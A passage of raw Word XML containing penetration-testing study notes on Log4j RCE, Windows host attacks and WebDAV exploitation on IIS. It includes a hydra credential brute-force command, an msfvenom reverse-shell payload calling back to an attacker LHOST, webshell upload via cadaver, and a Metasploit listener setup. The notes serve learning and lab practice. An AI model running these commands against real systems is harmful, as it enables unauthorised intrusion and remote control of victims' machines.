    </w:p>
    <w:p w14:paraId="2B0481F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webapp could be running Java while also servicing other languages such as NGINX or PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA7CE7" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32968F2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LDAP server, gimme RCE rn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE677D" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED5199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equest java class and return its contents, curled back to the malicious LDAP server that the attacker is listening to. Attackers will generally execute a command to give CLI access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042FD37" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F8CE2A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A2164"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Payload on MSFconsole for a lot of exploits: “windows/meterpreter/reverse_tcp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF9DD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is will just bounce back a reverse shell on the exploit if it is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7746465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ake sure to enumerate the machine as much as possible to find any flags! (or important files in the case of a pen-test, although you really don’t need to do this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06967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is much more difficult to traverse than Linux, need to research into a common method to find files to retrieve flags in a CTF format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7E325" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3861E2F3" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SYSTEM/HOST BASED ATTACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C5C52" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727E79AC"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 Introduction to System/Host Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EAB0D"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br/>
        <w:t>+ Overview of Windows Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Exploiting Windows Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Windows Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Windows File System Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+ Windows Credential Dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Windows Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4FD6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 The above 6 but for Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39E648" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4422C9"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Introduction to System/Host Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F74F8F" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B4194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and Linux are the two most used operating systems in internal networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3AD46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ystem/Host based attacks are primarily focused on exploiting inherent vulnerabilities on the target OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3F0F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nlike network-based attacks, host-based attacks are much more specialized and require an understanding of the target operating system and the vulnerabilities that affect said operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470741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ystem/Host based attacks involve exploiting misconfigurations and inherent vulnerabilities within the target OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921BACB" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E07D8EE"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Overview of Windows Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A24D7" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0401A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OS’s have been developed in C programming language, making them vulnerable to buffer overflows, arbitrary code execution, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C1452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bare bones when they are set up by default, they are not configured to run securely and require implementation of security practices for Windows to run securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187CEC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n the past, Windows did not patch Windows 7 very often in preparation to release Windows 10, leaving many companies running Windows 7 servers or hosts vulnerable to many attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215673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pgrading to newer versions of Windows is a contributing factor to exploitation, as many companies take a substantial length of time to upgrade their systems to the latest version of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2478AE"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is generally vulnerable to cross platform vulns, for example SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34364F54" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228E291E"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ypes of Windows Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC25C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nformation disclosure – Vulnerability that allows an attacker to access confidential data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2E6A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uffer overflows – Caused by a programming error, allows attackers to write data to a buffer and overrun the allocated buffer, consequently writing data to allocated memory addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7673D"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emote code execution – Vulnerability that allows an attacker to remotely execute code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15706F7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rivilege escalation – Vulnerability that allows an attacker to elevate their privileges after initial compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15702B8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Denial of Service – Vulnerability that allows an attacker to consume a system/host’s resources (CPU, RAM, Network etc.) consequently preventing the system from functioning normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B439079" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0A3A0A"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Frequently Exploited Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3561616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has various native services and protocols that can be configured to run on a host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3A3F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ese services provide an attacker with an access vector that they can utilize to gain access to a target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15D68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Having a good understanding of what these services are, how they work and their potential vulnerabilities is a vitally important skill to have as a penetration tester.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3E1DF" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728CDFFB"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IIS (Internet Information Services – TCP Ports 80/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179945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roprietary web server software developed by Microsoft that runs on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BFC9B"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ebDAV (Web Distributed Authoring &amp; Versioning) – TCP Ports 80/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2856B8F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HTTP extension that allows clients to update, delete, move, and copy files on a web server. WebDAV is used to enable a web server to act like a file server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220218AC"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SMB/CIFS (Server Message Block Protocol) – TCP Port 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579428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etwork file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9BF7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RDP (Remote Desktop Protocol) – TCP Port 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332CED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roprietary GUI remote access protocol developed by Microsoft and is used to remotely authenticate and interact with a Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36A237"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inRM (Windows Remote Management Protocol) – TCP Ports 5986/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9FF1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remote management protocol that can be used to facilitate remote access with Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABBA013" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF8AB68" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D47898"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Microsoft IIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223217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IS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C74ED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ssentially just a web server for Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4129211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t can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7610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IS can be used to host both static and dynamic web pages developed in both ASP.NET and PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481EBB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ypically configured to run on ports 80/443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C785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upported executable file extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E25A0F"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sp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5B5DC"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spx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3E8C8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config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A27F3E"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hp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F86A0F" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A097094"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ebDAV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730C14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ebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473564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ebDAV essentially enables a web server to function as a file server for collaborative authoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2807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ebDAV runs on top Microsoft IIS on ports 80/443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC753E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o connect to a WebDAV server, you will need to provide legitimate credentials. This is because WebDAV implements authentication in the form of a username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EBD79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ebDAV Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA4E3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first step is to determine whether WebDAV has been configured to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68575AB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erform a brute-force attack on the WebDAV server to identify legitimate credentials that we can use for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3FE3F0"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fter obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001856A4"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ools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C08D2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Davtest – Used to scan, authenticate, and exploit a WebDAV server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3ADC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re-installed on most offensive penetration testing distros like Kali or Parrot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F14B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daver – cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA9C33C"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re-installed on most offensive penetration testing distros like Kali or Parrot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3B51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nmap -sC” – Default script already includes a WebDAV scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236A9C5" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561B9473" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1AEE38"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Brute Forcing – WebDAV and other HTTP Authentication Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331D08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tilize hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918CFF0"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hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (HOST) http-get /webdav/”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDF352" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9C4F0E"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DavTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D91A3C0"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davtest -auth (USER):(PASS)-url </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00B1380B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-US"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://(IP/DOMAIN)/webdav/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3743EA8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ll test authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388CE20"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ests DAV connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72588B5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reates directory for DavTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6BA7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nd test files and test file execution, allowing us to determine what we can execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D094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Provides a summary on the tested files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A9C7A7" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405D29DC"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Cadaver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511BAEBE"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cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B1380B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-US"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>http://(IP/DOMAIN)/webdav/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B1380B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B965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ll prompt the user for credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93C0A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ll the provide the user with a pseudo shell and allows them to view the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78539FB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y creating our directory using DavTest, we can now upload a web shell to the directory that we created with Cadaver and curl a shell back to our own host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22F46A" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4707648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eb shells in Linux are generally located in “/usr/share/webshells”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A900C4" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8F11A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type of webshell we upload it determined by the successful test file uploads that we can see within the DavTest output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA430B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dav:/webdav/&gt; put /usr/share/webshells/(PATH OF FILE, + TYPE OF WEBSHELL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECEE7D"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is will then upload the webshell to the WebDAV file listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785F25F"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e can then run the web shell by clicking on it in the file listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B012D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t will then give us code execution permissions on the WebDAV server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D04E93" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6363304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Metasploit – WebDAV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FC338"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MSFVenom – Generate payloads to provide you with reverse shell access or remote access to a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C313AB8"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msfvenom -p windows/meterpreter/reverse_tcp LHOST=(LOCAL HOST) LPORT=1234 -f asp &gt; shell.asp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A69CF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is is if the davtest result shows that the “.asp” test file was accepted successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE01D1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X32 bit architecture is generally used for the windows/meterpreter session as it works for both x32 and x64 bit architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C832F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eed to set up a netcat or Postgresql service listener in order to listen before executing the file on the webdav server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505868D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rvice postgresql start &amp;&amp; msfconsole”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA55D8"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e multi/handler”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C2E97"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t payload windows/meterpreter/reverse_tcp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1418A4"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t the correct LHOST and LPORT and run, will set up a listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0237D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eterpreter &gt; sysinfo” “getuid” “dir”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32256BCE" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
